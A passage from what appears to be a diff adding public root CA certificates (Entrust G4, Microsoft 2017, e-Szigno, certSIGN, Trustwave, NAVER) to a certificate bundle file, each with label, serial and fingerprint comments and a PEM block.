+l6mc1X5VTMbeRRAc6uk7nwNT7u56AQIWeNTowr5GdogTPyK7SBIdUgC0An4hGh6c +JfTzPV4e0hz5sy229zdcxsshTrD3mUcYhcErulWuBurQB7Lcq9CClnXO0lD+mefP +L5/ndtFhKvshuzHQqp9HpLIiyhY6UFfEW0NnxWViA0kB60PZ2Pierc+xYw5F9KBa +LJstxabArahH9CdMOA0uG0k7UvToiIMrVCjU8jVStDKDYmlkDJGcn5fqdBb9HxEG +mpv0 +-----END CERTIFICATE----- + +# Issuer: CN=Entrust Root Certification Authority - G4 O=Entrust, Inc. OU=See www.entrust.net/legal-terms/(c) 2015 Entrust, Inc. - for authorized use only +# Subject: CN=Entrust Root Certification Authority - G4 O=Entrust, Inc. OU=See www.entrust.net/legal-terms/(c) 2015 Entrust, Inc. 
- for authorized use only +# Label: "Entrust Root Certification Authority - G4" +# Serial: 289383649854506086828220374796556676440 +# MD5 Fingerprint: 89:53:f1:83:23:b7:7c:8e:05:f1:8c:71:38:4e:1f:88 +# SHA1 Fingerprint: 14:88:4e:86:26:37:b0:26:af:59:62:5c:40:77:ec:35:29:ba:96:01 +# SHA256 Fingerprint: db:35:17:d1:f6:73:2a:2d:5a:b9:7c:53:3e:c7:07:79:ee:32:70:a6:2f:b4:ac:42:38:37:24:60:e6:f0:1e:88 +-----BEGIN CERTIFICATE----- +MIIGSzCCBDOgAwIBAgIRANm1Q3+vqTkPAAAAAFVlrVgwDQYJKoZIhvcNAQELBQAw +gb4xCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1FbnRydXN0LCBJbmMuMSgwJgYDVQQL +Ex9TZWUgd3d3LmVudHJ1c3QubmV0L2xlZ2FsLXRlcm1zMTkwNwYDVQQLEzAoYykg +MjAxNSBFbnRydXN0LCBJbmMuIC0gZm9yIGF1dGhvcml6ZWQgdXNlIG9ubHkxMjAw +BgNVBAMTKUVudHJ1c3QgUm9vdCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eSAtIEc0 +MB4XDTE1MDUyNzExMTExNloXDTM3MTIyNzExNDExNlowgb4xCzAJBgNVBAYTAlVT +MRYwFAYDVQQKEw1FbnRydXN0LCBJbmMuMSgwJgYDVQQLEx9TZWUgd3d3LmVudHJ1 +c3QubmV0L2xlZ2FsLXRlcm1zMTkwNwYDVQQLEzAoYykgMjAxNSBFbnRydXN0LCBJ +bmMuIC0gZm9yIGF1dGhvcml6ZWQgdXNlIG9ubHkxMjAwBgNVBAMTKUVudHJ1c3Qg +Um9vdCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eSAtIEc0MIICIjANBgkqhkiG9w0B +AQEFAAOCAg8AMIICCgKCAgEAsewsQu7i0TD/pZJH4i3DumSXbcr3DbVZwbPLqGgZ +2K+EbTBwXX7zLtJTmeH+H17ZSK9dE43b/2MzTdMAArzE+NEGCJR5WIoV3imz/f3E +T+iq4qA7ec2/a0My3dl0ELn39GjUu9CH1apLiipvKgS1sqbHoHrmSKvS0VnM1n4j +5pds8ELl3FFLFUHtSUrJ3hCX1nbB76W1NhSXNdh4IjVS70O92yfbYVaCNNzLiGAM +C1rlLAHGVK/XqsEQe9IFWrhAnoanw5CGAlZSCXqc0ieCU0plUmr1POeo8pyvi73T +DtTUXm6Hnmo9RR3RXRv06QqsYJn7ibT/mCzPfB3pAqoEmh643IhuJbNsZvc8kPNX +wbMv9W3y+8qh+CmdRouzavbmZwe+LGcKKh9asj5XxNMhIWNlUpEbsZmOeX7m640A +2Vqq6nPopIICR5b+W45UYaPrL0swsIsjdXJ8ITzI9vF01Bx7owVV7rtNOzK+mndm +nqxpkCIHH2E6lr7lmk/MBTwoWdPBDFSoWWG9yHJM6Nyfh3+9nEg2XpWjDrk4JFX8 +dWbrAuMINClKxuMrLzOg2qOGpRKX/YAr2hRC45K9PvJdXmd0LhyIRyk0X+IyqJwl +N4y6mACXi0mWHv0liqzc2thddG5msP9E36EYxr5ILzeUePiVSj9/E15dWf10hkNj +c0kCAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYD +VR0OBBYEFJ84xFYjwznooHFs6FRM5Og6sb9nMA0GCSqGSIb3DQEBCwUAA4ICAQAS +5UKme4sPDORGpbZgQIeMJX6tuGguW8ZAdjwD+MlZ9POrYs4QjbRaZIxowLByQzTS +Gwv2LFPSypBLhmb8qoMi9IsabyZIrHZ3CL/FmFz0Jomee8O5ZDIBf9PD3Vht7LGr +hFV0d4QEJ1JrhkzO3bll/9bGXp+aEJlLdWr+aumXIOTkdnrG0CSqkM0gkLpHZPt/ +B7NTeLUKYvJzQ85BK4FqLoUWlFPUa19yIqtRLULVAJyZv967lDtX/Zr1hstWO1uI +AeV8KEsD+UmDfLJ/fOPtjqF/YFOOVZ1QNBIPt5d7bIdKROf1beyAN/BYGW5KaHbw +H5Lk6rWS02FREAutp9lfx1/cH6NcjKF+m7ee01ZvZl4HliDtC3T7Zk6LERXpgUl+ +b7DUUH8i119lAg2m9IUe2K4GS0qn0jFmwvjO5QimpAKWRGhXxNUzzxkvFMSUHHuk +2fCfDrGA4tGeEWSpiBE6doLlYsKA2KSD7ZPvfC+QsDJMlhVoSFLUmQjAJOgc47Ol +IQ6SwJAfzyBfyjs4x7dtOvPmRLgOMWuIjnDrnBdSqEGULoe256YSxXXfW8AKbnuk +5F6G+TaU33fD6Q3AOfF5u0aOq0NZJ7cguyPpVkAh7DE9ZapD8j3fcEThuk0mEDuY +n/PIjhs4ViFqUZPTkcpG2om3PVODLAgfi49T3f+sHw== +-----END CERTIFICATE----- + +# Issuer: CN=Microsoft ECC Root Certificate Authority 2017 O=Microsoft Corporation +# Subject: CN=Microsoft ECC Root Certificate Authority 2017 O=Microsoft Corporation +# Label: "Microsoft ECC Root Certificate Authority 2017" +# Serial: 136839042543790627607696632466672567020 +# MD5 Fingerprint: dd:a1:03:e6:4a:93:10:d1:bf:f0:19:42:cb:fe:ed:67 +# SHA1 Fingerprint: 99:9a:64:c3:7f:f4:7d:9f:ab:95:f1:47:69:89:14:60:ee:c4:c3:c5 +# SHA256 Fingerprint: 35:8d:f3:9d:76:4a:f9:e1:b7:66:e9:c9:72:df:35:2e:e1:5c:fa:c2:27:af:6a:d1:d7:0e:8e:4a:6e:dc:ba:02 +-----BEGIN CERTIFICATE----- +MIICWTCCAd+gAwIBAgIQZvI9r4fei7FK6gxXMQHC7DAKBggqhkjOPQQDAzBlMQsw +CQYDVQQGEwJVUzEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTYwNAYD +VQQDEy1NaWNyb3NvZnQgRUNDIFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIw +MTcwHhcNMTkxMjE4MjMwNjQ1WhcNNDIwNzE4MjMxNjA0WjBlMQswCQYDVQQGEwJV 
+UzEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTYwNAYDVQQDEy1NaWNy +b3NvZnQgRUNDIFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTcwdjAQBgcq +hkjOPQIBBgUrgQQAIgNiAATUvD0CQnVBEyPNgASGAlEvaqiBYgtlzPbKnR5vSmZR +ogPZnZH6thaxjG7efM3beaYvzrvOcS/lpaso7GMEZpn4+vKTEAXhgShC48Zo9OYb +hGBKia/teQ87zvH2RPUBeMCjVDBSMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8E +BTADAQH/MB0GA1UdDgQWBBTIy5lycFIM+Oa+sgRXKSrPQhDtNTAQBgkrBgEEAYI3 +FQEEAwIBADAKBggqhkjOPQQDAwNoADBlAjBY8k3qDPlfXu5gKcs68tvWMoQZP3zV +L8KxzJOuULsJMsbG7X7JNpQS5GiFBqIb0C8CMQCZ6Ra0DvpWSNSkMBaReNtUjGUB +iudQZsIxtzm6uBoiB078a1QWIP8rtedMDE2mT3M= +-----END CERTIFICATE----- + +# Issuer: CN=Microsoft RSA Root Certificate Authority 2017 O=Microsoft Corporation +# Subject: CN=Microsoft RSA Root Certificate Authority 2017 O=Microsoft Corporation +# Label: "Microsoft RSA Root Certificate Authority 2017" +# Serial: 40975477897264996090493496164228220339 +# MD5 Fingerprint: 10:ff:00:ff:cf:c9:f8:c7:7a:c0:ee:35:8e:c9:0f:47 +# SHA1 Fingerprint: 73:a5:e6:4a:3b:ff:83:16:ff:0e:dc:cc:61:8a:90:6e:4e:ae:4d:74 +# SHA256 Fingerprint: c7:41:f7:0f:4b:2a:8d:88:bf:2e:71:c1:41:22:ef:53:ef:10:eb:a0:cf:a5:e6:4c:fa:20:f4:18:85:30:73:e0 +-----BEGIN CERTIFICATE----- +MIIFqDCCA5CgAwIBAgIQHtOXCV/YtLNHcB6qvn9FszANBgkqhkiG9w0BAQwFADBl +MQswCQYDVQQGEwJVUzEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTYw +NAYDVQQDEy1NaWNyb3NvZnQgUlNBIFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 +IDIwMTcwHhcNMTkxMjE4MjI1MTIyWhcNNDIwNzE4MjMwMDIzWjBlMQswCQYDVQQG +EwJVUzEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTYwNAYDVQQDEy1N +aWNyb3NvZnQgUlNBIFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTcwggIi +MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDKW76UM4wplZEWCpW9R2LBifOZ +Nt9GkMml7Xhqb0eRaPgnZ1AzHaGm++DlQ6OEAlcBXZxIQIJTELy/xztokLaCLeX0 +ZdDMbRnMlfl7rEqUrQ7eS0MdhweSE5CAg2Q1OQT85elss7YfUJQ4ZVBcF0a5toW1 +HLUX6NZFndiyJrDKxHBKrmCk3bPZ7Pw71VdyvD/IybLeS2v4I2wDwAW9lcfNcztm +gGTjGqwu+UcF8ga2m3P1eDNbx6H7JyqhtJqRjJHTOoI+dkC0zVJhUXAoP8XFWvLJ +jEm7FFtNyP9nTUwSlq31/niol4fX/V4ggNyhSyL71Imtus5Hl0dVe49FyGcohJUc +aDDv70ngNXtk55iwlNpNhTs+VcQor1fznhPbRiefHqJeRIOkpcrVE7NLP8TjwuaG +YaRSMLl6IE9vDzhTyzMMEyuP1pq9KsgtsRx9S1HKR9FIJ3Jdh+vVReZIZZ2vUpC6 +W6IYZVcSn2i51BVrlMRpIpj0M+Dt+VGOQVDJNE92kKz8OMHY4Xu54+OU4UZpyw4K +UGsTuqwPN1q3ErWQgR5WrlcihtnJ0tHXUeOrO8ZV/R4O03QK0dqq6mm4lyiPSMQH ++FJDOvTKVTUssKZqwJz58oHhEmrARdlns87/I6KJClTUFLkqqNfs+avNJVgyeY+Q +W5g5xAgGwax/Dj0ApQIDAQABo1QwUjAOBgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/ +BAUwAwEB/zAdBgNVHQ4EFgQUCctZf4aycI8awznjwNnpv7tNsiMwEAYJKwYBBAGC +NxUBBAMCAQAwDQYJKoZIhvcNAQEMBQADggIBAKyvPl3CEZaJjqPnktaXFbgToqZC +LgLNFgVZJ8og6Lq46BrsTaiXVq5lQ7GPAJtSzVXNUzltYkyLDVt8LkS/gxCP81OC +gMNPOsduET/m4xaRhPtthH80dK2Jp86519efhGSSvpWhrQlTM93uCupKUY5vVau6 +tZRGrox/2KJQJWVggEbbMwSubLWYdFQl3JPk+ONVFT24bcMKpBLBaYVu32TxU5nh +SnUgnZUP5NbcA/FZGOhHibJXWpS2qdgXKxdJ5XbLwVaZOjex/2kskZGT4d9Mozd2 +TaGf+G0eHdP67Pv0RR0Tbc/3WeUiJ3IrhvNXuzDtJE3cfVa7o7P4NHmJweDyAmH3 +pvwPuxwXC65B2Xy9J6P9LjrRk5Sxcx0ki69bIImtt2dmefU6xqaWM/5TkshGsRGR +xpl/j8nWZjEgQRCHLQzWwa80mMpkg/sTV9HB8Dx6jKXB/ZUhoHHBk2dxEuqPiApp +GWSZI1b7rCoucL5mxAyE7+WL85MB+GqQk2dLsmijtWKP6T+MejteD+eMuMZ87zf9 +dOLITzNy4ZQ5bb0Sr74MTnB8G2+NszKTc0QWbej09+CVgI+WXTik9KveCjCHk9hN +AHFiRSdLOkKEW39lt2c0Ui2cFmuqqNh7o0JMcccMyj6D5KbvtwEwXlGjefVwaaZB +RA+GsCyRxj3qrg+E +-----END CERTIFICATE----- + +# Issuer: CN=e-Szigno Root CA 2017 O=Microsec Ltd. +# Subject: CN=e-Szigno Root CA 2017 O=Microsec Ltd. 
+# Label: "e-Szigno Root CA 2017" +# Serial: 411379200276854331539784714 +# MD5 Fingerprint: de:1f:f6:9e:84:ae:a7:b4:21:ce:1e:58:7d:d1:84:98 +# SHA1 Fingerprint: 89:d4:83:03:4f:9e:9a:48:80:5f:72:37:d4:a9:a6:ef:cb:7c:1f:d1 +# SHA256 Fingerprint: be:b0:0b:30:83:9b:9b:c3:2c:32:e4:44:79:05:95:06:41:f2:64:21:b1:5e:d0:89:19:8b:51:8a:e2:ea:1b:99 +-----BEGIN CERTIFICATE----- +MIICQDCCAeWgAwIBAgIMAVRI7yH9l1kN9QQKMAoGCCqGSM49BAMCMHExCzAJBgNV +BAYTAkhVMREwDwYDVQQHDAhCdWRhcGVzdDEWMBQGA1UECgwNTWljcm9zZWMgTHRk +LjEXMBUGA1UEYQwOVkFUSFUtMjM1ODQ0OTcxHjAcBgNVBAMMFWUtU3ppZ25vIFJv +b3QgQ0EgMjAxNzAeFw0xNzA4MjIxMjA3MDZaFw00MjA4MjIxMjA3MDZaMHExCzAJ +BgNVBAYTAkhVMREwDwYDVQQHDAhCdWRhcGVzdDEWMBQGA1UECgwNTWljcm9zZWMg +THRkLjEXMBUGA1UEYQwOVkFUSFUtMjM1ODQ0OTcxHjAcBgNVBAMMFWUtU3ppZ25v +IFJvb3QgQ0EgMjAxNzBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABJbcPYrYsHtv +xie+RJCxs1YVe45DJH0ahFnuY2iyxl6H0BVIHqiQrb1TotreOpCmYF9oMrWGQd+H +Wyx7xf58etqjYzBhMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0G +A1UdDgQWBBSHERUI0arBeAyxr87GyZDvvzAEwDAfBgNVHSMEGDAWgBSHERUI0arB +eAyxr87GyZDvvzAEwDAKBggqhkjOPQQDAgNJADBGAiEAtVfd14pVCzbhhkT61Nlo +jbjcI4qKDdQvfepz7L9NbKgCIQDLpbQS+ue16M9+k/zzNY9vTlp8tLxOsvxyqltZ ++efcMQ== +-----END CERTIFICATE----- + +# Issuer: O=CERTSIGN SA OU=certSIGN ROOT CA G2 +# Subject: O=CERTSIGN SA OU=certSIGN ROOT CA G2 +# Label: "certSIGN Root CA G2" +# Serial: 313609486401300475190 +# MD5 Fingerprint: 8c:f1:75:8a:c6:19:cf:94:b7:f7:65:20:87:c3:97:c7 +# SHA1 Fingerprint: 26:f9:93:b4:ed:3d:28:27:b0:b9:4b:a7:e9:15:1d:a3:8d:92:e5:32 +# SHA256 Fingerprint: 65:7c:fe:2f:a7:3f:aa:38:46:25:71:f3:32:a2:36:3a:46:fc:e7:02:09:51:71:07:02:cd:fb:b6:ee:da:33:05 +-----BEGIN CERTIFICATE----- +MIIFRzCCAy+gAwIBAgIJEQA0tk7GNi02MA0GCSqGSIb3DQEBCwUAMEExCzAJBgNV +BAYTAlJPMRQwEgYDVQQKEwtDRVJUU0lHTiBTQTEcMBoGA1UECxMTY2VydFNJR04g +Uk9PVCBDQSBHMjAeFw0xNzAyMDYwOTI3MzVaFw00MjAyMDYwOTI3MzVaMEExCzAJ +BgNVBAYTAlJPMRQwEgYDVQQKEwtDRVJUU0lHTiBTQTEcMBoGA1UECxMTY2VydFNJ +R04gUk9PVCBDQSBHMjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAMDF +dRmRfUR0dIf+DjuW3NgBFszuY5HnC2/OOwppGnzC46+CjobXXo9X69MhWf05N0Iw +vlDqtg+piNguLWkh59E3GE59kdUWX2tbAMI5Qw02hVK5U2UPHULlj88F0+7cDBrZ +uIt4ImfkabBoxTzkbFpG583H+u/E7Eu9aqSs/cwoUe+StCmrqzWaTOTECMYmzPhp +n+Sc8CnTXPnGFiWeI8MgwT0PPzhAsP6CRDiqWhqKa2NYOLQV07YRaXseVO6MGiKs +cpc/I1mbySKEwQdPzH/iV8oScLumZfNpdWO9lfsbl83kqK/20U6o2YpxJM02PbyW +xPFsqa7lzw1uKA2wDrXKUXt4FMMgL3/7FFXhEZn91QqhngLjYl/rNUssuHLoPj1P +rCy7Lobio3aP5ZMqz6WryFyNSwb/EkaseMsUBzXgqd+L6a8VTxaJW732jcZZroiF +DsGJ6x9nxUWO/203Nit4ZoORUSs9/1F3dmKh7Gc+PoGD4FapUB8fepmrY7+EF3fx +DTvf95xhszWYijqy7DwaNz9+j5LP2RIUZNoQAhVB/0/E6xyjyfqZ90bp4RjZsbgy +LcsUDFDYg2WD7rlcz8sFWkz6GZdr1l0T08JcVLwyc6B49fFtHsufpaafItzRUZ6C +eWRgKRM+o/1Pcmqr4tTluCRVLERLiohEnMqE0yo7AgMBAAGjQjBAMA8GA1UdEwEB +/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0GA1UdDgQWBBSCIS1mxteg4BXrzkwJ +d8RgnlRuAzANBgkqhkiG9w0BAQsFAAOCAgEAYN4auOfyYILVAzOBywaK8SJJ6ejq +kX/GM15oGQOGO0MBzwdw5AgeZYWR5hEit/UCI46uuR59H35s5r0l1ZUa8gWmr4UC +b6741jH/JclKyMeKqdmfS0mbEVeZkkMR3rYzpMzXjWR91M08KCy0mpbqTfXERMQl +qiCA2ClV9+BB/AYm/7k29UMUA2Z44RGx2iBfRgB4ACGlHgAoYXhvqAEBj500mv/0 +OJD7uNGzcgbJceaBxXntC6Z58hMLnPddDnskk7RI24Zf3lCGeOdA5jGokHZwYa+c +NywRtYK3qq4kNFtyDGkNzVmf9nGvnAvRCjj5BiKDUyUM/FHE5r7iOZULJK2v0ZXk +ltd0ZGtxTgI8qoXzIKNDOXZbbFD+mpwUHmUUihW9o4JFWklWatKcsWMy5WHgUyIO +pwpJ6st+H6jiYoD2EEVSmAYY3qXNL3+q1Ok+CHLsIwMCPKaq2LxndD0UF/tUSxfj +03k9bWtJySgOLnRQvwzZRjoQhsmnP+mg7H/rpXdYaXHmgwo38oZJar55CJD2AhZk +PuXaTH4MNMn5X7azKFGnpyuqSfqNZSlO42sTp5SjLVFteAxEy9/eCG/Oo2Sr05WE +1LlSVHJ7liXMvGnjSG4N0MedJ5qq+BOS3R7fY581qRY27Iy4g/Q9iY/NtBde17MX +QRBdJ3NghVdJIgc= +-----END CERTIFICATE----- + 
+# Issuer: CN=Trustwave Global Certification Authority O=Trustwave Holdings, Inc. +# Subject: CN=Trustwave Global Certification Authority O=Trustwave Holdings, Inc. +# Label: "Trustwave Global Certification Authority" +# Serial: 1846098327275375458322922162 +# MD5 Fingerprint: f8:1c:18:2d:2f:ba:5f:6d:a1:6c:bc:c7:ab:91:c7:0e +# SHA1 Fingerprint: 2f:8f:36:4f:e1:58:97:44:21:59:87:a5:2a:9a:d0:69:95:26:7f:b5 +# SHA256 Fingerprint: 97:55:20:15:f5:dd:fc:3c:87:88:c0:06:94:45:55:40:88:94:45:00:84:f1:00:86:70:86:bc:1a:2b:b5:8d:c8 +-----BEGIN CERTIFICATE----- +MIIF2jCCA8KgAwIBAgIMBfcOhtpJ80Y1LrqyMA0GCSqGSIb3DQEBCwUAMIGIMQsw +CQYDVQQGEwJVUzERMA8GA1UECAwISWxsaW5vaXMxEDAOBgNVBAcMB0NoaWNhZ28x +ITAfBgNVBAoMGFRydXN0d2F2ZSBIb2xkaW5ncywgSW5jLjExMC8GA1UEAwwoVHJ1 +c3R3YXZlIEdsb2JhbCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xNzA4MjMx +OTM0MTJaFw00MjA4MjMxOTM0MTJaMIGIMQswCQYDVQQGEwJVUzERMA8GA1UECAwI +SWxsaW5vaXMxEDAOBgNVBAcMB0NoaWNhZ28xITAfBgNVBAoMGFRydXN0d2F2ZSBI +b2xkaW5ncywgSW5jLjExMC8GA1UEAwwoVHJ1c3R3YXZlIEdsb2JhbCBDZXJ0aWZp +Y2F0aW9uIEF1dGhvcml0eTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIB +ALldUShLPDeS0YLOvR29zd24q88KPuFd5dyqCblXAj7mY2Hf8g+CY66j96xz0Xzn +swuvCAAJWX/NKSqIk4cXGIDtiLK0thAfLdZfVaITXdHG6wZWiYj+rDKd/VzDBcdu +7oaJuogDnXIhhpCujwOl3J+IKMujkkkP7NAP4m1ET4BqstTnoApTAbqOl5F2brz8 +1Ws25kCI1nsvXwXoLG0R8+eyvpJETNKXpP7ScoFDB5zpET71ixpZfR9oWN0EACyW +80OzfpgZdNmcc9kYvkHHNHnZ9GLCQ7mzJ7Aiy/k9UscwR7PJPrhq4ufogXBeQotP +JqX+OsIgbrv4Fo7NDKm0G2x2EOFYeUY+VM6AqFcJNykbmROPDMjWLBz7BegIlT1l +RtzuzWniTY+HKE40Cz7PFNm73bZQmq131BnW2hqIyE4bJ3XYsgjxroMwuREOzYfw +hI0Vcnyh78zyiGG69Gm7DIwLdVcEuE4qFC49DxweMqZiNu5m4iK4BUBjECLzMx10 +coos9TkpoNPnG4CELcU9402x/RpvumUHO1jsQkUm+9jaJXLE9gCxInm943xZYkqc +BW89zubWR2OZxiRvchLIrH+QtAuRcOi35hYQcRfO3gZPSEF9NUqjifLJS3tBEW1n +twiYTOURGa5CgNz7kAXU+FDKvuStx8KU1xad5hePrzb7AgMBAAGjQjBAMA8GA1Ud +EwEB/wQFMAMBAf8wHQYDVR0OBBYEFJngGWcNYtt2s9o9uFvo/ULSMQ6HMA4GA1Ud +DwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEAmHNw4rDT7TnsTGDZqRKGFx6W +0OhUKDtkLSGm+J1WE2pIPU/HPinbbViDVD2HfSMF1OQc3Og4ZYbFdada2zUFvXfe +uyk3QAUHw5RSn8pk3fEbK9xGChACMf1KaA0HZJDmHvUqoai7PF35owgLEQzxPy0Q +lG/+4jSHg9bP5Rs1bdID4bANqKCqRieCNqcVtgimQlRXtpla4gt5kNdXElE1GYhB +aCXUNxeEFfsBctyV3lImIJgm4nb1J2/6ADtKYdkNy1GTKv0WBpanI5ojSP5RvbbE +sLFUzt5sQa0WZ37b/TjNuThOssFgy50X31ieemKyJo90lZvkWx3SD92YHJtZuSPT +MaCm/zjdzyBP6VhWOmfD0faZmZ26NraAL4hHT4a/RDqA5Dccprrql5gR0IRiR2Qe +qu5AvzSxnI9O4fKSTx+O856X3vOmeWqJcU9LJxdI/uz0UA9PSX3MReO9ekDFQdxh +VicGaeVyQYHTtgGJoC86cnn+OjC/QezHYj6RS8fZMXZC+fc8Y+wmjHMMfRod6qh8 +h6jCJ3zhM0EPz8/8AKAigJ5Kp28AsEFFtyLKaEjFQqKu3R3y4G5OBVixwJAWKqQ9 +EEC+j2Jjg6mcgn0tAumDMHzLJ8n9HmYAsC7TIS+OMxZsmO0QqAfWzJPP29FpHOTK +yeC2nOnOcXHebD8WpHk= +-----END CERTIFICATE----- + +# Issuer: CN=Trustwave Global ECC P256 Certification Authority O=Trustwave Holdings, Inc. +# Subject: CN=Trustwave Global ECC P256 Certification Authority O=Trustwave Holdings, Inc. 
+# Label: "Trustwave Global ECC P256 Certification Authority" +# Serial: 4151900041497450638097112925 +# MD5 Fingerprint: 5b:44:e3:8d:5d:36:86:26:e8:0d:05:d2:59:a7:83:54 +# SHA1 Fingerprint: b4:90:82:dd:45:0c:be:8b:5b:b1:66:d3:e2:a4:08:26:cd:ed:42:cf +# SHA256 Fingerprint: 94:5b:bc:82:5e:a5:54:f4:89:d1:fd:51:a7:3d:df:2e:a6:24:ac:70:19:a0:52:05:22:5c:22:a7:8c:cf:a8:b4 +-----BEGIN CERTIFICATE----- +MIICYDCCAgegAwIBAgIMDWpfCD8oXD5Rld9dMAoGCCqGSM49BAMCMIGRMQswCQYD +VQQGEwJVUzERMA8GA1UECBMISWxsaW5vaXMxEDAOBgNVBAcTB0NoaWNhZ28xITAf +BgNVBAoTGFRydXN0d2F2ZSBIb2xkaW5ncywgSW5jLjE6MDgGA1UEAxMxVHJ1c3R3 +YXZlIEdsb2JhbCBFQ0MgUDI1NiBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0x +NzA4MjMxOTM1MTBaFw00MjA4MjMxOTM1MTBaMIGRMQswCQYDVQQGEwJVUzERMA8G +A1UECBMISWxsaW5vaXMxEDAOBgNVBAcTB0NoaWNhZ28xITAfBgNVBAoTGFRydXN0 +d2F2ZSBIb2xkaW5ncywgSW5jLjE6MDgGA1UEAxMxVHJ1c3R3YXZlIEdsb2JhbCBF +Q0MgUDI1NiBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTBZMBMGByqGSM49AgEGCCqG +SM49AwEHA0IABH77bOYj43MyCMpg5lOcunSNGLB4kFKA3TjASh3RqMyTpJcGOMoN +FWLGjgEqZZ2q3zSRLoHB5DOSMcT9CTqmP62jQzBBMA8GA1UdEwEB/wQFMAMBAf8w +DwYDVR0PAQH/BAUDAwcGADAdBgNVHQ4EFgQUo0EGrJBt0UrrdaVKEJmzsaGLSvcw +CgYIKoZIzj0EAwIDRwAwRAIgB+ZU2g6gWrKuEZ+Hxbb/ad4lvvigtwjzRM4q3wgh +DDcCIC0mA6AFvWvR9lz4ZcyGbbOcNEhjhAnFjXca4syc4XR7 +-----END CERTIFICATE----- + +# Issuer: CN=Trustwave Global ECC P384 Certification Authority O=Trustwave Holdings, Inc. +# Subject: CN=Trustwave Global ECC P384 Certification Authority O=Trustwave Holdings, Inc. +# Label: "Trustwave Global ECC P384 Certification Authority" +# Serial: 2704997926503831671788816187 +# MD5 Fingerprint: ea:cf:60:c4:3b:b9:15:29:40:a1:97:ed:78:27:93:d6 +# SHA1 Fingerprint: e7:f3:a3:c8:cf:6f:c3:04:2e:6d:0e:67:32:c5:9e:68:95:0d:5e:d2 +# SHA256 Fingerprint: 55:90:38:59:c8:c0:c3:eb:b8:75:9e:ce:4e:25:57:22:5f:f5:75:8b:bd:38:eb:d4:82:76:60:1e:1b:d5:80:97 +-----BEGIN CERTIFICATE----- +MIICnTCCAiSgAwIBAgIMCL2Fl2yZJ6SAaEc7MAoGCCqGSM49BAMDMIGRMQswCQYD +VQQGEwJVUzERMA8GA1UECBMISWxsaW5vaXMxEDAOBgNVBAcTB0NoaWNhZ28xITAf +BgNVBAoTGFRydXN0d2F2ZSBIb2xkaW5ncywgSW5jLjE6MDgGA1UEAxMxVHJ1c3R3 +YXZlIEdsb2JhbCBFQ0MgUDM4NCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0x +NzA4MjMxOTM2NDNaFw00MjA4MjMxOTM2NDNaMIGRMQswCQYDVQQGEwJVUzERMA8G +A1UECBMISWxsaW5vaXMxEDAOBgNVBAcTB0NoaWNhZ28xITAfBgNVBAoTGFRydXN0 +d2F2ZSBIb2xkaW5ncywgSW5jLjE6MDgGA1UEAxMxVHJ1c3R3YXZlIEdsb2JhbCBF +Q0MgUDM4NCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTB2MBAGByqGSM49AgEGBSuB +BAAiA2IABGvaDXU1CDFHBa5FmVXxERMuSvgQMSOjfoPTfygIOiYaOs+Xgh+AtycJ +j9GOMMQKmw6sWASr9zZ9lCOkmwqKi6vr/TklZvFe/oyujUF5nQlgziip04pt89ZF +1PKYhDhloKNDMEEwDwYDVR0TAQH/BAUwAwEB/zAPBgNVHQ8BAf8EBQMDBwYAMB0G +A1UdDgQWBBRVqYSJ0sEyvRjLbKYHTsjnnb6CkDAKBggqhkjOPQQDAwNnADBkAjA3 +AZKXRRJ+oPM+rRk6ct30UJMDEr5E0k9BpIycnR+j9sKS50gU/k6bpZFXrsY3crsC +MGclCrEMXu6pY5Jv5ZAL/mYiykf9ijH3g/56vxC+GCsej/YpHpRZ744hN8tRmKVu +Sw== +-----END CERTIFICATE----- + +# Issuer: CN=NAVER Global Root Certification Authority O=NAVER BUSINESS PLATFORM Corp. +# Subject: CN=NAVER Global Root Certification Authority O=NAVER BUSINESS PLATFORM Corp. 
+# Label: "NAVER Global Root Certification Authority" +# Serial: 9013692873798656336226253319739695165984492813 +# MD5 Fingerprint: c8:7e:41:f6:25:3b:f5:09:b3:17:e8:46:3d:bf:d0:9b +# SHA1 Fingerprint: 8f:6b:f2:a9:27:4a:da:14:a0:c4:f4:8e:61:27:f9:c0:1e:78:5d:d1 +# SHA256 Fingerprint: 88:f4:38:dc:f8:ff:d1:fa:8f:42:91:15:ff:e5:f8:2a:e1:e0:6e:0c:70:c3:75:fa:ad:71:7b:34:a4:9e:72:65 +-----BEGIN CERTIFICATE----- +MIIFojCCA4qgAwIBAgIUAZQwHqIL3fXFMyqxQ0Rx+NZQTQ0wDQYJKoZIhvcNAQEM +BQAwaTELMAkGA1UEBhMCS1IxJjAkBgNVBAoMHU5BVkVSIEJVU0lORVNTIFBMQVRG +T1JNIENvcnAuMTIwMAYDVQQDDClOQVZFUiBHbG9iYWwgUm9vdCBDZXJ0aWZpY2F0 +aW9uIEF1dGhvcml0eTAeFw0xNzA4MTgwODU4NDJaFw0zNzA4MTgyMzU5NTlaMGkx 